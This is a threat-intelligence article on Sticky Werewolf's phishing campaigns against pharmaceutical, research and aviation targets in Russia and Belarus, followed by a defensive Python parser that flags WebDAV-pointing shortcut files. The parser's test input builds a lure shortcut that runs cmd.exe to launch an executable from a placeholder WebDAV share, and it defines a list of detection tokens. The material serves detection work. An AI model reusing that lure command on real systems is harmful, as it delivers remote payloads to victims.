Sticky Werewolf's Cyber Attacks on Businesses in Russia and Belarus

Cybersecurity researchers have identified an expansion of attacks by the threat actor tracked as Sticky Werewolf against organizations in Russia and Belarus. The group's latest campaign has widened its scope beyond government organizations to include the pharmaceutical industry, microbiology research institutes, and the aviation sector.

Latest Developments:

  • Sophisticated Phishing Techniques:

    • Initial Approach: Early campaigns used phishing emails with links to malicious files hosted on file-sharing services such as gofile.io.
    • Current Strategy: The group now sends RAR archives containing LNK files that point to payloads hosted on WebDAV servers, a change in delivery method from the earlier hosted links.
  • Broadened Target Range:

    • Earlier Focus: Primarily targeted government organizations.
    • Expanded Targets: Now includes pharmaceutical companies, research institutes, and aviation firms, a shift toward a wider and more consequential set of sectors.
  • Complex Attack Chain:

    • New Mechanism: RAR attachments that, when extracted, present LNK files alongside a decoy PDF document posing as a video conference invitation.
    • Execution Flow: Opening an LNK file launches a binary from a WebDAV server; that binary executes an obfuscated batch script, which in turn runs an AutoIt script that injects the final payload.
  • Malicious Payloads:

    • Current Deployments: Commodity RATs (Remote Access Trojans) and data-stealing malware, such as Rhadamanthys and Ozone RAT.
    • Technical Details: The payloads are protected with a variant of the CypherIT crypter, retooled from the original version found on hacking forums.
  • Geopolitical Implications:

    • Possible Attribution: While exact origins remain unclear, the geopolitical context hints at potential links to pro-Ukrainian cyberespionage groups or hacktivist factions.
    • Associated Threat Actors: Includes groups like Cloud Werewolf, Quartz Wolf, Red Wolf, and Scaly Wolf, all contributing to a complex cyber threat landscape.
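As an added illustration of the execution flow above (example code written for this page, not from the researchers or the article), the following Python parses the StringData fields of a Windows shortcut (.lnk) and flags values that point at a WebDAV location, the check a mail gateway or sandbox could run over the LNK files extracted from a RAR attachment. The host name and file names are constructed placeholders, and the example only inspects the StringData fields; real lures may carry the target in the LinkTargetIDList, which this parser skips over.

```python
import struct
# LinkFlags bits from the MS-SHLLINK specification (only the ones needed here).
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# HeaderSize (0x4C) followed by the fixed LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))
# Substrings that betray a target on a WebDAV share rather than on the local disk.
WEBDAV_TOKENS = ("davwwwroot", "@80\\", "@443\\", "@ssl\\", "http://", "https://")

def parse_lnk_strings(blob: bytes) -> dict:
    """Return the StringData fields (relative path, arguments, ...) of a .lnk file."""
    if blob[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    pos = 0x4C                                    # skip the fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                       # LinkTargetIDList: uint16 size + data
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfo: uint32 size that includes itself
        pos += struct.unpack_from("<I", blob, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:              # StringData entries appear in this fixed order
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1    # CountCharacters, not bytes
        raw = blob[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields

def webdav_indicators(blob: bytes) -> list:
    """List the StringData fields whose value points at a WebDAV location."""
    fields = parse_lnk_strings(blob)
    return sorted(name for name, value in fields.items()
                  if any(tok in value.lower() for tok in WEBDAV_TOKENS))

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal .lnk (header + two StringData entries) as test input."""
    header = LNK_MAGIC + struct.pack("<I", HAS_REL_PATH | HAS_ARGS | IS_UNICODE) + bytes(0x4C - 24)
    for text in (relative_path, arguments):
        header += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header

# Constructed samples: a lure pointing at a WebDAV share (placeholder host) and a benign shortcut.
LURE_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe", r"/c \\dav.example.invalid@80\DavWWWRoot\invite.exe")
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", r"C:\Users\Public\notes.txt")
```

`webdav_indicators(LURE_LNK)` returns `['arguments']` while the benign shortcut returns an empty list; in a gateway the same check would be applied to every .lnk found next to a decoy PDF inside an archive.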

Historical Context:

  • Initial Identification:

    • Documentation: Sticky Werewolf was first reported by BI.ZONE in October 2023, with activity traced back to April 2023.
  • Related Cyber Clusters:

    • Sapphire Werewolf: Linked to over 300 attacks across various sectors including education, manufacturing, IT, defense, and aerospace engineering.
    • Fluffy Wolf and Mysterious Werewolf: Known for deploying spear-phishing tactics to spread malware such as Remote Utilities, XMRig miner, WarZone RAT, and a custom backdoor named RingSpy.

As Sticky Werewolf refines its tactics and broadens its target set, defenders in Russia and Belarus face a growing challenge. Vigilance and robust security controls remain essential to counter the techniques employed by these threat actors.